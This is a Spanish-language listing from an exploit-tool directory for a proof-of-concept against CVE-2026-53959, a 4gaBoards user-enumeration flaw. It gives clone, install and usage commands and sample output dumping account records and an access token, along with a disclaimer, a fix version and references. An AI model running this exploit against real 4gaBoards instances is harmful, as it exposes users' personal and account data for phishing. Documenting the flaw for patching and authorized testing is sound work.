Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-53959 — 4gaBoards < 3.3.9 - Divulgación de información de usuario | Kitploit
Herramientas/GitHubGitHub/anirbala98/cve-2026-53959
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónSeguridad de APIs
GitHubanirbala98/cve-2026-53959

CVE-2026-53959

4gaBoards < 3.3.9 - Divulgación de información de usuario

Ver Repositorio
1hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-53959 - 4gaBoards < 3.3.9 - Divulgación de información de usuarios

Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE-2026-53959

Descargo de responsabilidad

Este proyecto se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas. No lo utilice contra sistemas que no le pertenezcan o para los que no tenga permiso de prueba.

Resumen

4gaBoards es un sistema de tableros para la gestión de proyectos en tiempo real. Antes de la versión 3.3.9, 4gaBoards permite a cualquier usuario autenticado enumerar la información de cuenta de todos los usuarios mediante GET /api/users y recuperar cuentas arbitrarias mediante GET /api/users/:id. Las acciones users/index y users/show se basan únicamente en la política predeterminada is-authenticated en server/config/policies.js, y server/api/controllers/users/index.js devuelve el resultado de sails.helpers.users.getMany() sin autorización específica del solicitante ni saneamiento de la respuesta. Las respuestas exponen campos como email, phone, organization, name, isAdmin, ssoGoogleEmail, ssoGithubEmail y otros campos de correo vinculados a SSO, incluidos datos de administradores. Esto permite la enumeración de usuarios en toda la instancia, la pérdida de privacidad y el reconocimiento selectivo para phishing. Este problema se corrigió en la versión 3.3.9.

Versión afectada

ComponenteVersión
Vulnerable<=3.3.8
Corregida3.3.9

Requisitos

  • Python 3.13.14
  • Requests 2.32.5

Instalación

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-53959.git
cd CVE-2026-53959/
pip install -r requirements.txt

Uso

root@kitploit:~
python exploit.py <base_url>
python exploit.py http://localhost:3000

Ejemplo

root@kitploit:~
└─$ python exploit.py http://localhost:3000
[*] Creating a new user...
[+] Registration successful! 
[+] Retrieved Access Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjRjOTE1NzNmLTY5YzktNGQ5OS04ZWUxLWQ1ODZjNzZkNzAyZiJ9.eyJpYXQiOjE3ODcxMjExNzUsInN1YiI6IjE4NDQ5MDI5OTc5OTQyNDMzNTAiLCJleHAiOjE4MTg2NTcxNzV9.OwNTyxE-JS0pztbX4sLz0uzu3GjeyETNFQVbGVxzXxA

[*] Dumping user information...

{"items":[{"id":"1844837973439284230","createdAt":"2026-08-19T04:23:44.000Z","updatedAt":null,"email":"[email protected]","isAdmin":true,"isVerified":false,"name":"Demo Demo","username":"demo","phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":"2026-08-19T06:29:23.463Z","lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844837973439284230","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null},{"id":"1844902997994243350","createdAt":"2026-08-19T06:32:55.000Z","updatedAt":null,"email":"[email protected]","isAdmin":false,"isVerified":false,"name":"test","username":null,"phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":null,"lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844902997994243350","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null}]}

Mitigación

Actualice 4gaBoards a la versión 3.3.9 o superior.

Referencias

  • https://www.tenable.com/cve/CVE-2026-53959
  • https://github.com/RARgames/4gaBoards/security/advisories/GHSA-p77f-p47g-h72p
Descargar herramienta